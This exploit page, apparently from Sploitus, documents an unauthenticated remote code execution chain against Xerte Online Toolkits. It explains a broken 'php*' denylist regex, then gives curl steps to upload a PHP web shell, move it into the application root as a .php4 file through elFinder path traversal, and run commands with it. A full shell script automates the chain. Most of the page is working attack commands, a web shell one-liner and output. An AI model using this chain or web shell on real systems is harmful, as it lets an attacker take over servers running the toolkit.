## https://sploitus.com/exploit?id=0CBCF367-9831-5537-A712-27F3921E0B97
# Xerte Online Toolkits

~~~
'/(readme\.txt)|\.(html|php|php5|php*|phtml|phar|inc|py|pl|sh)$/i',
'read' => false,
~~~
In a regular expression `*` quantifies only the character immediately before it, so `php*` means "ph" followed by zero or more "p": it matches "ph", "php", "phpp", "phppp" and so on, not the family of `php`-like extensions the pattern was presumably meant to cover. Because the extension alternation is anchored with `$`, a filename ending in `.php4` matches none of the listed alternatives and is allowed through. That gap in the denylist is what the chain below relies on.
## Chained Attack Vector Reproduction Steps
### Unauthenticated Remote Code Execution
If authentication is enabled (not the default Xerte configuration), an attacker must know, or brute-force, a valid user's username in order to form the project directory name. If guest authentication is used (the default), the user part is empty and the target project directory is simply 1--Nottingham.
An unauthenticated attacker can create a directory "example_dir" and upload a file "file.txt" containing PHP code into any project directory under USER-FILES/.
They can then combine the relative path traversal and incomplete denylist weaknesses in Xerte's elfinder connector: renaming the uploaded file to "example_dir/../../../../file.php4" moves file.txt to the application root as "file.php4". Since ".php4" is not on the denylist, and the web server in this setup hands ".php4" files to the PHP interpreter (step 6 confirms it), the attacker obtains remote code execution.
1. Retrieve the full application root filepath
~~~bash
curl 'http://localhost/xt/setup'
~~~
2. Create the directory
Request Params:
uploadDir: Application root + USER-FILES/{project id}-{user}-Nottingham/
uploadURL: URL to the project directory
cmd: mkdir
name: The new directory's name
target: The elfinder id of the media/ directory. Because media/ is the elfinder volume root, this is always "l1_Lw" (volume "l1", then the base64 of "/", which is "Lw==" with the padding stripped)
~~~bash
curl 'http://localhost/xt/editor/elfinder/php/connector.php?uploadDir=/opt/lampp/htdocs/xt/USER-FILES/1-user2-Nottingham/&uploadURL=http://localhost/xt/USER-FILES/1-user2-Nottingham/&cmd=mkdir&name=folder1&target=l1_Lw'
~~~
3. Upload malicious php file
*The payload starts with an HTML tag (the tag itself has been lost from this copy of the page); that leading tag is what stops elfinder's MIME type detection from classifying the file as PHP.
Request Params:
uploadDir: Application root + USER-FILES/{project id}-{user}-Nottingham/
uploadURL: URL to the project directory
cmd: upload
target: The elfinder id of the media/ directory. Because media/ is the elfinder volume root, this is always "l1_Lw"
upload[]: The file to be uploaded
~~~bash
# The payload body is missing from this copy of the page. The web shell below is an
# assumed reconstruction consistent with step 6 (it runs the "cmd" GET parameter);
# the leading HTML tag is the part that defeats elfinder's MIME sniffing.
echo '<html><?php system($_GET["cmd"]); ?>' > file.txt
curl -X POST 'http://localhost/xt/editor/elfinder/php/connector.php?uploadDir=/opt/lampp/htdocs/xt/USER-FILES/1-user2-Nottingham/&uploadURL=http://localhost/xt/USER-FILES/1-user2-Nottingham/' \
-F 'cmd=upload' \
-F 'target=l1_Lw' \
-F "upload[]=@file.txt;type=text/plain"
~~~
4. Generate the elfinder id for the new file
~~~bash
echo -n 'file.txt' | base64
ZmlsZS50eHQ=
~~~
Strip the base64 padding (here a single "=").
Then prefix the volume identifier. The volume is always "l1", joined with "_". The root directory itself is encoded as "/", whose base64 "Lw==" becomes "Lw" after stripping padding, which is where the "l1_Lw" target used above comes from.
Result: `l1_ZmlsZS50eHQ`
5. Rename the file and perform Relative Path Traversal
Request Params:
uploadDir: Application root + USER-FILES/{project id}-{user}-Nottingham/
uploadURL: URL to the project directory
cmd: rename
name: The directory name from step 2, the path traversal sequence, and the new file name with a .php4 extension
target: The elfinder id generated for the uploaded file in step 4, `l1_ZmlsZS50eHQ`
~~~bash
curl 'http://localhost/xt/editor/elfinder/php/connector.php?uploadDir=/opt/lampp/htdocs/xt/USER-FILES/1-user2-Nottingham/&uploadURL=http://localhost/xt/USER-FILES/1-user2-Nottingham/&cmd=rename&name=folder1%2F..%2F..%2F..%2F..%2Fs.php4&target=l1_ZmlsZS50eHQ'
~~~
6. Verify code execution
Request Params:
cmd: The command to run
~~~bash
curl http://localhost/xt/s.php4?cmd=id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
~~~
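The six steps above as one parameterised script, together with a check of the denylist regex from the top of the page. This is an added example, not code from the original advisory or from the Xerte project. The host, application root, project directory and payload file name default to the lab values used on the page and are assumptions; the function names (`denylist_blocks`, `elfinder_hash`, `traversal_name`, `run_chain`) are this example's own. It only contacts a target when `XERTE_RUN=1` is set.

```shell
#!/bin/sh
# Added example (not from the original advisory). Defaults below are assumptions
# matching the page's lab values; override them through the environment.
BASE_URL="${BASE_URL:-http://localhost/xt}"
APP_ROOT="${APP_ROOT:-/opt/lampp/htdocs/xt}"     # value read from /setup in step 1
PROJECT="${PROJECT:-1-user2-Nottingham}"          # {project id}-{user}-Nottingham
PAYLOAD_FILE="${PAYLOAD_FILE:-file.txt}"          # prepared as in step 3 (assumed to exist)
CONNECTOR="$BASE_URL/editor/elfinder/php/connector.php"
UPLOAD_DIR="$APP_ROOT/USER-FILES/$PROJECT/"
UPLOAD_URL="$BASE_URL/USER-FILES/$PROJECT/"

# The page's extension denylist as an ERE. 'php*' is 'ph' followed by zero or
# more 'p', so '.php4' never matches and would be accepted.
DENY_RE='(readme\.txt)|\.(html|php|php5|php*|phtml|phar|inc|py|pl|sh)$'
denylist_blocks() {            # exit 0 if the name would be refused
    printf '%s\n' "$1" | grep -Eiq "$DENY_RE"
}

# elFinder file id: volume id, '_', then base64 of the path relative to the
# volume root, with '+/=' mapped to '-_.' and trailing '.' stripped. The root
# itself is encoded as the separator '/', hence the constant l1_Lw.
elfinder_hash() {
    enc=$(printf '%s' "${1:-/}" | base64 | tr -d '\n' | tr '+/=' '-_.' | sed 's/\.*$//')
    printf 'l1_%s\n' "$enc"
}

# Rename target for step 5. Relative to media/, the name climbs out of the
# created directory, then media/, the project directory and USER-FILES/
# (four '..'), landing in the application root.
traversal_name() {             # $1 = directory from step 2, $2 = final file name
    printf '%s/../../../../%s\n' "$1" "$2"
}

connector() {                  # GET request to the connector with encoded params
    curl -sS -G "$CONNECTOR" \
        --data-urlencode "uploadDir=$UPLOAD_DIR" \
        --data-urlencode "uploadURL=$UPLOAD_URL" "$@"
}

run_chain() {
    dir="folder1"; webshell="s.php4"
    if denylist_blocks "$webshell"; then
        echo "$webshell is on the denylist, pick another extension" >&2; return 1
    fi
    # step 2: directory inside media/
    connector --data-urlencode "cmd=mkdir" --data-urlencode "name=$dir" \
              --data-urlencode "target=$(elfinder_hash /)"
    # step 3: upload the payload as text/plain
    curl -sS "$CONNECTOR?uploadDir=$UPLOAD_DIR&uploadURL=$UPLOAD_URL" \
        -F 'cmd=upload' -F "target=$(elfinder_hash /)" \
        -F "upload[]=@$PAYLOAD_FILE;type=text/plain"
    # steps 4 and 5: id of the uploaded file, then rename with traversal
    connector --data-urlencode "cmd=rename" \
              --data-urlencode "name=$(traversal_name "$dir" "$webshell")" \
              --data-urlencode "target=$(elfinder_hash "$(basename "$PAYLOAD_FILE")")"
    # step 6: confirm execution
    curl -sS "$BASE_URL/$webshell?cmd=id"
}

# Only contact a target when explicitly asked to.
if [ "${XERTE_RUN:-0}" = 1 ]; then run_chain; fi
```

Run it as `XERTE_RUN=1 sh chain.sh` against a lab instance; without `XERTE_RUN` it only defines the helpers, so `elfinder_hash` and `denylist_blocks` can be sourced and tried on their own (for instance to check which extensions the denylist actually refuses before choosing one).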